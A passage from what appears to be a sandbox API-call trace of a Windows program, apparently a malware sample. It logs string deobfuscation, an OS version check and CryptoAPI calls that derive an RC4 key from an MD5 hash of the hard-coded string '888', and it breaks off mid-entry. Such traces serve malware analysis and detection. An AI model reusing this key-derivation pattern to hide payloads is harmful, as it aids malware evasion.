HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.088] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0212.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0212.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.089] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0212.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0212.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0212.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0212.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0212.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0212.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.089] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0212.089] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.089] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0212.089] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.089] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.089] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.089] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.090] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.090] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.090] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0212.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0212.090] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.090] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.090] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.090] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.090] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.090] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.090] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0212.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0212.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fa0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0212.091] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bef0) returned 1 [0212.091] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.091] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.091] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0212.091] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.091] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0212.091] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.091] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.091] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.091] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.091] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.092] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.092] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.092] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.092] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.092] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.092] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.092] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.092] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.092] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.092] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.092] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.092] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0212.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.092] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0212.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.092] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.092] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.092] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.093] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.093] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.093] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.093] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.094] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.094] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.094] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.094] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.094] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.094] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.094] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.094] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.094] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.094] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.094] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.094] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.094] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.094] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.094] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.094] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.094] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.094] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.094] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.094] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.094] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.094] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.094] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.095] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.095] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0212.095] CryptCreateHash (in: hProv=0xa7bef0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0212.095] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.095] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.095] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.095] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bf8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.095] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0212.095] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.095] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.095] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.095] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.095] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.095] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.095] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.095] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0212.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab3c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0212.096] CryptHashData (hHash=0x9e2078, pbData=0x2a71d18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0212.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.096] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.096] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.096] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.096] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.096] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.096] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.096] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.096] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.096] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.096] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.096] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0212.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab218, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0212.096] CryptDeriveKey (in: hProv=0xa7bef0, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e21f8) returned 1 [0212.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a73dc8 [0212.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0212.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0212.097] RtlAllocateHeap (HeapHandle=0x2af0000, 